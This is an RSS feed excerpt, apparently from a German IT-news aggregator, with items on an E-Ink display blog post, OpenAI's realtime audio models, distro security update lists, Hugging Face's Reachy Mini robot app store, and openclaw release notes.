<content:encoded><![CDATA[Gizmodo has an <a href="http://gizmodo.com/5378310/eink-gallery">article</a> by Brian Lam that has some assertions about E-Ink displays. He writes:<br><span>"E-ink is superior for replicating paper, but it can't even support realtime cursor, movements or button presses, let alone video"<br><span></span></span>Realtime cursor generally just means functionality as shown here: a) <a href="http://www.youtube.com/watch?v=aoG7XHO7P0s">rgbpaint running on top of full X11 stack (kdrive/Xfbdev, gtk, etc) on a PXA255 GPIO driven display</a> or b) <a href="http://www.youtube.com/watch?v=53X_XlqBdfM">sketch</a> on same hardware but custom app written by E-Ink engineers to talk directly to hardware from Linux userspace bitbanging gpio. So E-Ink displays <span>can</span> support realtime cursor movements and button presses. His point about video is somewhat true if you want true 60Hz full image quality video, but you can get watchable video with some tradeoffs by using waveforms that reduce update time by trading off image quality. In Portland, I showed a demo of y<a href="http://www.youtube.com/watch?v=i4Loe5rIu4I">outube running on an E-Ink display</a>. I only got about 4-8 Hz (depending on video content) because of software and bitbanged GPIO limitations.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI: Neue Audio-Modelle für Echtzeit-KI-Support]]></title>
<description><![CDATA[OpenAI bringt drei neue Audio-Modelle für die API: GPT-Realtime-2 für Echtzeit-Gespräche, Translate für Übersetzungen und Whisper für Live-Transkription.]]></description>
<link>https://tsecurity.de/de/3498859/it-nachrichten/openai-neue-audio-modelle-fuer-echtzeit-ki-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498859/it-nachrichten/openai-neue-audio-modelle-fuer-echtzeit-ki-support/</guid>
<pubDate>Fri, 08 May 2026 12:18:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI bringt drei neue Audio-Modelle für die API: GPT-Realtime-2 für Echtzeit-Gespräche, Translate für Übersetzungen und Whisper für Live-Transkription.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Releases Three Realtime Audio Models: GPT-Realtime-2, GPT-Realtime-Translate, and GPT-Realtime-Whisper in the Realtime API]]></title>
<description><![CDATA[Three purpose-built audio models expand what developers can build with live voice: reasoning agents, speech translation across 70+ languages, and streaming transcription.
The post OpenAI Releases Three Realtime Audio Models: GPT-Realtime-2, GPT-Realtime-Translate, and GPT-Realtime-Whisper in the ...]]></description>
<link>https://tsecurity.de/de/3498334/ai-nachrichten/openai-releases-three-realtime-audio-models-gpt-realtime-2-gpt-realtime-translate-and-gpt-realtime-whisper-in-the-realtime-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498334/ai-nachrichten/openai-releases-three-realtime-audio-models-gpt-realtime-2-gpt-realtime-translate-and-gpt-realtime-whisper-in-the-realtime-api/</guid>
<pubDate>Fri, 08 May 2026 09:20:01 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Three purpose-built audio models expand what developers can build with live voice: reasoning agents, speech translation across 70+ languages, and streaming transcription.</p>
<p>The post <a href="https://www.marktechpost.com/2026/05/08/openai-releases-three-realtime-audio-models-gpt-realtime-2-gpt-realtime-translate-and-gpt-realtime-whisper-in-the-realtime-api/">OpenAI Releases Three Realtime Audio Models: GPT-Realtime-2, GPT-Realtime-Translate, and GPT-Realtime-Whisper in the Realtime API</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI bringt GPT-5-Intelligenz in Echtzeit-Sprachmodelle]]></title>
<description><![CDATA[OpenAI hat mit GPT-Realtime-2 ein neues Sprachmodell vorgestellt, das über die API verfügbar ist. Was das Modell von seinen Vorgängern unterscheidet, ist die Tatsache, dass es erstmals GPT-5-Niveau beim Denken und Schlussfolgern in Echtzeit-Sprachinteraktionen mitbringt. Das klingt erstmal techni...]]></description>
<link>https://tsecurity.de/de/3498107/it-nachrichten/openai-bringt-gpt-5-intelligenz-in-echtzeit-sprachmodelle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498107/it-nachrichten/openai-bringt-gpt-5-intelligenz-in-echtzeit-sprachmodelle/</guid>
<pubDate>Fri, 08 May 2026 07:48:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI hat mit GPT-Realtime-2 ein neues Sprachmodell vorgestellt, das über die API verfügbar ist. Was das Modell von seinen Vorgängern unterscheidet, ist die Tatsache, dass es erstmals GPT-5-Niveau beim Denken und Schlussfolgern in Echtzeit-Sprachinteraktionen mitbringt. Das klingt erstmal technisch trocken,...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/openai-bringt-gpt-5-intelligenz-in-echtzeit-sprachmodelle/">OpenAI bringt GPT-5-Intelligenz in Echtzeit-Sprachmodelle</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
</p><div><strong>Auf dem Laufenden bleiben?</strong>
<a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a></div>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Advancing voice intelligence with new models in the API]]></title>
<description><![CDATA[Explore new realtime voice models in the OpenAI API that can reason, translate, and transcribe speech, enabling more natural and intelligent voice experiences.]]></description>
<link>https://tsecurity.de/de/3497748/ai-nachrichten/advancing-voice-intelligence-with-new-models-in-the-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497748/ai-nachrichten/advancing-voice-intelligence-with-new-models-in-the-api/</guid>
<pubDate>Fri, 08 May 2026 03:48:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Explore new realtime voice models in the OpenAI API that can reason, translate, and transcribe speech, enabling more natural and intelligent voice experiences.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (dovecot, fence-agents, freeipmi, git-lfs, image-builder, kernel, libsoup, osbuild-composer, and python-tornado), Debian (apache2, libdatetime-timezone-perl, lrzip, tzdata, and wireshark), Fedora (dovecot, forgejo-runner, gh, gnutls, krb5, nano, pdns...]]></description>
<link>https://tsecurity.de/de/3496080/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496080/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 07 May 2026 15:14:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (dovecot, fence-agents, freeipmi, git-lfs, image-builder, kernel, libsoup, osbuild-composer, and python-tornado), <b>Debian</b> (apache2, libdatetime-timezone-perl, lrzip, tzdata, and wireshark), <b>Fedora</b> (dovecot, forgejo-runner, gh, gnutls, krb5, nano, pdns, pyOpenSSL, squid, vim, and xorg-x11-server-Xwayland), <b>Mageia</b> (graphicsmagick, kernel-linus, krb5-appl, libexif, libtiff, nano, nginx, ntfs-3g, opam, perl-Net-CIDR-Lite, perl-Starlet, perl-Starman, tcpflow, and virtualbox), <b>Oracle</b> (dovecot, fence-agents, freeipmi, image-builder, kernel, libcap, LibRaw, libsoup, openssh, osbuild-composer, python, python-tornado, python3, systemd, thunderbird, and tigervnc), <b>SUSE</b> (containerd, curl, erlang, flatpak, java-11-openjdk, java-21-openjdk, java-25-openjdk, liblxc-devel, libpng12, libthrift-0_23_0, openCryptoki, openexr, openssl-3, python3, python311-social-auth-core, rclone, skim, and thunderbird), and <b>Ubuntu</b> (apache2, coin3, editorconfig-core, insighttoolkit, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17, linux-hwe-6.17, linux-oracle, linux-realtime, linux-realtime-6.17, linux-azure, linux-azure-6.17, linux-oem-6.17, linux-azure-5.15, linux-gcp-6.8, nghttp2, python-dynaconf, slurm-wlm, swish-e, and webkit2gtk).]]></content:encoded>
</item>
<item>
<title><![CDATA[The app store for robots has arrived: Hugging Face launches open-source Reachy Mini App Store with 200+ apps]]></title>
<description><![CDATA[There's an app for nearly every imaginable user and use case these days, but one thing they all have in common is that they're centered around one device: the smartphone.That changes today as Hugging Face, the 10-year-old New York City startup best known for being the go-to place online to host a...]]></description>
<link>https://tsecurity.de/de/3493441/it-nachrichten/the-app-store-for-robots-has-arrived-hugging-face-launches-open-source-reachy-mini-app-store-with-200-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3493441/it-nachrichten/the-app-store-for-robots-has-arrived-hugging-face-launches-open-source-reachy-mini-app-store-with-200-apps/</guid>
<pubDate>Wed, 06 May 2026 18:17:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>There's an app for nearly every imaginable user and use case these days, but one thing they all have in common is that they're centered around one device: the smartphone.</p><p>That changes today as <a href="https://huggingface.co/">Hugging Face</a>, the 10-year-old New York City startup best known for being the go-to place online to host and use cutting-edge, open-source AI models, agents and applications, launches a <a href="https://pollen-robotics-reachy-mini.hf.space/apps">new App Store</a> for <a href="https://huggingface.co/reachy-mini">Reachy Mini</a>, its low-cost ($299) open-source physical robot that<a href="https://venturebeat.com/ai/hugging-face-just-launched-a-299-robot-that-could-disrupt-the-entire-robotics-industry"> debuted back in July 2025</a> (itself the fruit of Hugging Face's <a href="https://techcrunch.com/2025/04/14/hugging-face-buys-a-humanoid-robotics-startup/">acquisition of another startup, Pollen Robotics</a>). </p><p>The new Hugging Face Reachy Mini App Store already hosts a library of over 200 community-built applications, and Reachy Mini owners will be able to download any of these free of charge to start (unlike smartphone apps, there's no monetization option for app creators on this store — yet). </p><p>The Reachy Mini App Store will also offer Reachy Mini owners — around 10,000 units have been sold so far since last year — an easy means of building their own custom apps for the tiny, stationary desktop robot with built-in camera eyes, speaker, and microphone, via<a href="https://huggingface.co/spaces/smolagents/ml-intern"> Hugging Face's existing, AI-powered agent called "ML Intern."</a></p><p>The significance lies not just in the hardware, but in the removal of the "roboticist" barrier; for the first time, individuals without a background in engineering or coding are shipping functional robotics software in under an hour.</p><p>"Anyone can build the apps," said Clément Delangue, CEO and co-founder of Hugging Face, in a video interview with VentureBeat. "My intuition is that more and more [AI] model builders will release on Reachy Mini as a way to test the robotics ability of new models." </p><h2><b>Make robots as accessible to laypeople as PCs and smartphones</b></h2><p>The technical bottleneck in robotics has historically been the scarcity of high-quality training data. </p><p>While Large Language Models (LLMs) have mastered general-purpose coding by training on massive repositories like Microsoft's <a href="https://github.com/huggingface/lerobot">GitHub</a>, the volume of code specific to robotics remains "tiny" by comparison (though Github does contain likely the largest existent, publicly accessible library of robotics code to date, with <a href="https://github.com/topics/robotics">more than 17,000 different repositories or "repos"</a> dedicated to the field). </p><p>This lack of data has meant that, until now, AI agents were relatively poor at understanding the physical abstractions and firmware requirements of hardware.</p><p>Hugging Face’s solution is an <b>agentic toolkit</b> that acts as an intermediary. Rather than forcing a user to learn a specific robotics SDK or master the nuances of a robot's firmware, the toolkit allows a user to describe a desired behavior in plain English—for instance, "wave when someone says good morning". </p><p>An AI agent then handles the heavy lifting: it writes the code, tests it against the robot's specific constraints, and ships the final package</p><p>"Historically, it’s been extremely hard," Delangue told VentureBeat of building robotics applications. "But we’ve worked really hard on the topic with a mix of open sourcing everything we do, working on the right abstractions for robotics, and making it easier for agents to understand and use it."</p><p>The platform is model-agnostic, supporting a wide range of leading intelligence engines. Users can build apps using Hugging Face’s own ML Intern agent or leverage external models including GPT-5.5, Claude Opus 4.6, Kimmy 2.6, Mini Max GM5, and Deep Sig V4 Pro. </p><p>For real-time interaction, the official conversation apps utilize OpenAI Realtime and Gemini Live. By providing these high-level abstractions, Hugging Face has collapsed the traditional "integration weeks" of robotics work into a process that takes minutes.</p><h2><b>Low-cost Reachy Mini is a hit</b></h2><p>In order to take advantage of the new Hugging Face Reachy Mini App Store, users are encouraged to purchase <b>Reachy Mini</b>, a cute desktop robot <a href="https://huggingface.co/blog/reachy-mini">Hugging Face launched back in July 2025</a> as an affordable, open-source alternative to the existing, commercially available robots from the likes of Boston Dynamics, whose infamous<a href="https://standardbots.com/blog/spot-robot"> Spot robot dog retails for around $70,000.</a> <a href="https://futurology.tech/products/unitree-go2-air-robot-dog-open-box-new?variant=49774542913813&amp;country=US&amp;currency=USD&amp;utm_medium=product_sync&amp;utm_source=google&amp;utm_content=sag_organic&amp;utm_campaign=sag_organic&amp;utm_source=google&amp;utm_medium=cpc&amp;utm_campaign=Shopping%20/%20Robot%20Dogs%20/%20Tier1&amp;utm_term=online&amp;utm_content=pla&amp;gad_source=1&amp;gad_campaignid=23771882061&amp;gbraid=0AAAAAq2eWXxRUqBZi5m6I91vMfri0nOjN&amp;gclid=CjwKCAjwqubPBhBOEiwAzgZX2msSDKS6VnIOHbuPqkCLObGlaflNfM-cWg-3gMJr_6KONgAxTputQhoCZvgQAvD_BwE">Even Chinese competitors start at $1,900+</a>.</p><p>In contrast, the Reachy Mini is accessibly priced for hobbyists and developers. It comes in two variants:</p><ul><li><p><b>Reachy Mini Lite ($299 plus shipping)</b>: A tethered version that connects via USB and uses an external computer for processing.</p></li><li><p><b>Reachy Mini Wireless ($449 plus shipping):</b> A standalone version featuring an on-board Raspberry Pi CM 4 and Wi-Fi connectivity.</p></li></ul><p>Delangue said that of the 10,000 Reachy Mini units sold so far, 3,000 were sold in just the past two weeks. Hugging Face expects to ship another 1,000 units within the next 30 days.</p><p>Even those who don't own a Reachy Mini can still develop apps for it, however, using the Reachy Mini App Store and the Reachy App, which contains a 3D simulation of the robot and its responses. </p><p>The <b>App Store</b> itself is hosted on the Hugging Face Hub. It functions much like a standard software repository but for hardware behaviors:</p><ul><li><p><b>Search and Install</b>: Users can find apps, click a button, and install them directly to their robot.</p></li><li><p><b>Forkability</b>: Every app is "forkable," meaning a user can duplicate an existing app and ask an AI agent to modify it (e.g., "make it answer in French").</p></li><li><p><b>Simulation Mode</b>: Crucially, the store includes a browser-based simulator. This allows users who do not own a physical Reachy Mini to build, test, and play with the catalog in a virtual environment.</p></li></ul><p>Both are part of Hugging Face's ongoing <a href="https://huggingface.co/lerobot">"Le Robot"</a> effort — a project that began in <a href="https://venturebeat.com/automation/hugging-face-launches-lerobot-open-source-robotics-code-library">2024</a> with Hugging Face researchers specializing in robotics and AI developing and publishing on the web their own open-source code, tutorials, and hardware to make robotics development more accessible to a wider audience. </p><p>And unlike Github, which is designed for a developer audience, the Hugging Face Reachy Mini App Store is designed for robot owners and users who may have no technical experience or training whatsoever.</p><h2><b>Continuing with the open-source ethos and practice</b></h2><p>Hugging Face’s strategy is rooted in the belief that closed-source hardware and software are "almost impossible" to build for at scale. </p><p>Delangue notes that closed systems prevent the training of agents and limit the ability of the community to innovate. Consequently, the entire Reachy Mini platform is open-source.</p><p>This open licensing model has two primary implications for the ecosystem:</p><ol><li><p><b>Accelerated Development</b>: Because the code is public and integrated with the Hugging Face ecosystem via "Spaces," Hugging Face's feature for hosting AI-powered web apps <a href="https://www.ibm.com/think/topics/hugging-face">launched in 2021</a>, agents can more easily learn how to interact with the hardware.</p></li><li><p><b>Community Sovereignty</b>: Apps are not locked behind a proprietary wall. Currently, all 200+ apps on the store are free, though the platform's foundation on "Spaces" provides the flexibility for creators to potentially monetize their work in the future.</p></li></ol><p>"For the moment, all the apps are free," Delangue noted. "It’s flexible, it’s built on [Hugging Face] Spaces, so at some point maybe people are going to make them paid."</p><h2><b>Robotics enters its accessible hobbyist era</b></h2><p>Hugging Face's Reachy Mini App Store is launching with 200 apps already available.</p><p>So who built them, and how did they do it without this platform existing prior?</p><p>Delangue told VentureBeat that more than <b>150 different creators</b> have contributed to the store, most of whom had never written a line of robotics code before.</p><p>Yet, they have been able to do so thanks to Hugging Face's ML Intern and <a href="https://github.com/huggingface/lerobot">Github</a>. The new Hugging Face Reachy Mini App Store now puts the tools and existing apps into one place for easier accessibility. </p><p>Delangue was keen to highlight one of the early Reachy robotics app developers in particular to VentureBeat: Joel Cohen, a 78-year-old retired marketing executive. </p><p>Cohen, who is colorblind and has no technical background, spent two weeks assembling his Reachy Mini Lite (a task that usually takes three hours). Despite these physical challenges, he used an AI agent to build a "VP of Future Thinking" facilitator for his Zoom-based CEO peer groups. The app enables the robot to:</p><ul><li><p>Greet 29 members by name.</p></li><li><p>Fact-check discussions in real-time.</p></li><li><p>Summarize key themes and push back on surface-level answers.</p></li></ul><p>"I built this by describing what I needed in plain English," Cohen stated in a press release provided to VentureBeat ahead of the launch.  "No SDK. No robotics background. No developer experience".</p><p>Other community-driven applications include:</p><ul><li><p><b>Emotional Damage Chess</b>: A robot that plays chess and mocks the user’s blunders.</p></li><li><p><b>Reachy Phone Home</b>: An anti-procrastination tool that detects when a user picks up their phone and tells them to get back to work.</p></li><li><p><b>Language Tutor</b>: A physical companion that listens to speech and corrects accents.</p></li><li><p><b>F1 Race Commentator</b>: A desk companion that calls Formula 1 races live as they happen.</p></li></ul><p>Delangue himself related to VentureBeat that in only a few hours, he built an app for his own Reachy Mini robot at the Hugging Face Miami office to have the robot act as a receptionist. </p><p>“It basically does face recognition to detect when you arrive in the office, and then it looks at you and onboards you," Delangue related. "It says, ‘Hey, welcome to the office. Who are you here to see?’ Then it sends me a message: ‘Carl just arrived at the office. He’s here to meet you, and for these reasons.’ It works a little bit as my welcoming booth at the office, and it took me less than two hours to build that.”</p><p>Even for an experienced founder and developer as Delangue, building apps for a robot was out of the question until the combination of Reachy Mini and ML Intern. </p><p>“For me, it would have been impossible," the Hugging Face CEO said. "If you weren’t a robotics developer, it probably would have been impossible, or it would have taken a few months."</p><h2><b>Democratizing robotics</b></h2><p>The launch of the agentic App Store signals a fundamental shift in how we interact with machines. For sixty years, the field was gated by the requirement for deep technical expertise. </p><p>By combining low-cost open hardware with the reasoning capabilities of modern AI agents, Hugging Face is moving toward a future where the hardware is a commodity and the behavior is limited only by what a user can describe.</p><p>As Delangue noted during the launch, the goal was to provide a platform for people who "want to get into robotics but don’t have the hardware or the skills". </p><p>With nearly 10,000 robots now "in the wild" and a burgeoning store of agent-written apps, the Reachy Mini has become the most widely deployed open-source desktop robot in history. </p><p>The question is no longer how to build a robot, but what—now that the gate is open—we will ask them to do.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Inworld AI Launches Realtime TTS-2: A Closed-Loop Voice Model That Adapts to How You Actually Talk]]></title>
<description><![CDATA[The Inworld AI's new model conditions on full audio context, not just transcripts — a meaningful architectural shift for voice-first AI agents
The post Inworld AI Launches Realtime TTS-2: A Closed-Loop Voice Model That Adapts to How You Actually Talk appeared first on MarkTechPost.]]></description>
<link>https://tsecurity.de/de/3491120/ai-nachrichten/inworld-ai-launches-realtime-tts-2-a-closed-loop-voice-model-that-adapts-to-how-you-actually-talk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3491120/ai-nachrichten/inworld-ai-launches-realtime-tts-2-a-closed-loop-voice-model-that-adapts-to-how-you-actually-talk/</guid>
<pubDate>Wed, 06 May 2026 02:49:46 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Inworld AI's new model conditions on full audio context, not just transcripts — a meaningful architectural shift for voice-first AI agents</p>
<p>The post <a href="https://www.marktechpost.com/2026/05/05/inworld-ai-launches-realtime-tts-2-a-closed-loop-voice-model-that-adapts-to-how-you-actually-talk/">Inworld AI Launches Realtime TTS-2: A Closed-Loop Voice Model That Adapts to How You Actually Talk</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[April 2026: Firestore search and joins, SQL Connect realtime, Dart Functions, and more!]]></title>
<description><![CDATA[Author: Firebase - Bewertung: 2x - Views:44 Hear the latest updates across Firebase from Google Cloud Next to an exciting update for Flutter developers. Discover the latest in AI Logic Server Prompt Template chat and function calling, how Firebase now integrates with Google Cloud's Application De...]]></description>
<link>https://tsecurity.de/de/3490325/it-security-video/april-2026-firestore-search-and-joins-sql-connect-realtime-dart-functions-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490325/it-security-video/april-2026-firestore-search-and-joins-sql-connect-realtime-dart-functions-and-more/</guid>
<pubDate>Tue, 05 May 2026 18:18:05 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Firebase - Bewertung: 2x - Views:44 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/v5ioEFQqZeo?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Hear the latest updates across Firebase from Google Cloud Next to an exciting update for Flutter developers. Discover the latest in AI Logic Server Prompt Template chat and function calling, how Firebase now integrates with Google Cloud's Application Design Center, and much more. <br />
<br />
Resources:<br />
Get started with Firestore Enterprise edition → https://goo.gle/4t5PhVi <br />
Firebase SQL Connect → https://goo.gle/4t2NSP9 <br />
Firebase Phone Number Verification →  https://goo.gle/4t4yotW <br />
What’s new from Firebase at Google Cloud Next 2026 → https://goo.gle/3OMmVkV <br />
<br />
Chapters:<br />
0:00 - Firestore updates<br />
1:00 - Data Connect is now SQL Connect<br />
1:47 - Experimental support for Dart on Firebase Functions<br />
2:01 - Firebase AI Logic updates <br />
2:33 - Firebase Authentication Phone Number Verification<br />
3:09 - Firebase integration with Application Design Center<br />
<br />
#Firebase<br />
<br />
Watch more Firebase Release Notes → https://goo.gle/firebase-release-notes<br />
Subscribe to Firebase → https://goo.gle/Firebase<br />
<br />
Speaker: Morgan Chen<br />
Products Mentioned: Firebase, Firebase Data Connect, Firebase AI Logic, Firebase Authentication, Cloud Firestore, Cloud Functions<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.4-beta.2]]></title>
<description><![CDATA[2026.5.4
Highlights

Google Meet/Voice Call: make Twilio dial-in joins speak through the realtime Gemini voice bridge with paced audio streaming, backpressure-aware buffering, barge-in queue clearing, and no TwiML fallback during realtime speech, giving Meet participants a much snappier OpenClaw ...]]></description>
<link>https://tsecurity.de/de/3488084/downloads/openclaw-202654-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488084/downloads/openclaw-202654-beta2/</guid>
<pubDate>Tue, 05 May 2026 03:46:07 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.4</h2>
<h3>Highlights</h3>
<ul>
<li>Google Meet/Voice Call: make Twilio dial-in joins speak through the realtime Gemini voice bridge with paced audio streaming, backpressure-aware buffering, barge-in queue clearing, and no TwiML fallback during realtime speech, giving Meet participants a much snappier OpenClaw voice agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373796027" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77064" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77064/hovercard" href="https://github.com/openclaw/openclaw/pull/77064">#77064</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Plugins/migration: emit catalog-backed install hints when <code>plugins.entries</code> or <code>plugins.allow</code> references an official external plugin that is not installed, so upgraded configs point operators to <code>openclaw plugins install &lt;spec&gt;</code> instead of telling them to remove valid plugin config. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379011890" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77483" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77483/hovercard" href="https://github.com/openclaw/openclaw/issues/77483">#77483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>OpenAI/Codex media: advertise Codex audio transcription in runtime and manifest metadata and route active Codex chat models to the OpenAI transcription default instead of sending chat model ids to audio transcription. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Dependencies: refresh runtime and provider packages including Pi 0.73.0, ACPX adapters, OpenAI, Anthropic, Slack, and TypeScript native preview, while keeping the Bedrock runtime installer override pinned below the Windows ARM Node 24 npm resolver failure.</li>
<li>Agents/performance: pass the resolved workspace through BTW, compaction, embedded-run model generation, and PDF model setup so explicit agent-dir model refreshes can reuse the current workspace-scoped plugin metadata snapshot instead of falling back to cold plugin metadata scans. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379470874" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77519" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77519/hovercard" href="https://github.com/openclaw/openclaw/issues/77519">#77519</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379682883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77532/hovercard" href="https://github.com/openclaw/openclaw/issues/77532">#77532</a>)</li>
<li>Plugins/performance: let unscoped model catalog and manifest-contract readers reuse the current workspace-compatible plugin metadata snapshot, avoiding repeated cold plugin metadata scans on hot control-plane paths while preserving env/config/workspace compatibility checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379470874" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77519" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77519/hovercard" href="https://github.com/openclaw/openclaw/issues/77519">#77519</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379682883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77532/hovercard" href="https://github.com/openclaw/openclaw/issues/77532">#77532</a>)</li>
<li>Config/plugin auto-enable: prefer the claiming plugin manifest id over a built-in channel alias when auto-allowlisting a configured channel, so WeCom/Yuanbao-style aliases resolve to the installed plugin id. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Beandon13/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Beandon13">@Beandon13</a>.</li>
<li>Secrets/apply: preserve auth-profile <code>keyRef</code> and <code>tokenRef</code> fields when scrubbing provider-target secrets, so the canonical SecretRef metadata survives <code>secrets apply</code> without keeping plaintext values. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Beandon13/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Beandon13">@Beandon13</a>.</li>
<li>Plugins/active-memory: skip session-store channel entries that contain <code>:</code> when resolving the recall subagent's channel, so QQ c2c agent IDs (e.g. <code>c2c:10D4F7C2…</code>) and other scoped conversation IDs do not reach bundled-plugin <code>dirName</code> validation and crash the recall run. The same guard already applied to explicit <code>channelId</code> params (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371944266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76704/hovercard" href="https://github.com/openclaw/openclaw/issues/76704">#76704</a>); this extends it to store-derived channels. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4377923292" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77396/hovercard" href="https://github.com/openclaw/openclaw/issues/77396">#77396</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Secrets/external channel contracts: also look in <code>&lt;rootDir&gt;/dist/</code> when resolving the <code>secret-contract-api</code> sidecar, so npm-published externalized channel plugins (e.g. <code>@openclaw/discord</code> since 2026.5.2) whose compiled artifacts live under <code>dist/</code> actually contribute their channel SecretRef contracts to the runtime snapshot. Without this, env-backed <code>channels.discord.token</code> SecretRefs silently failed to resolve at gateway start on 2026.5.3, leaving the channel <code>not configured</code> even though <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370882504" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76449" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76449/hovercard" href="https://github.com/openclaw/openclaw/pull/76449">#76449</a> had landed the generic external-contract loader. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mogglemoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mogglemoss">@mogglemoss</a>.</li>
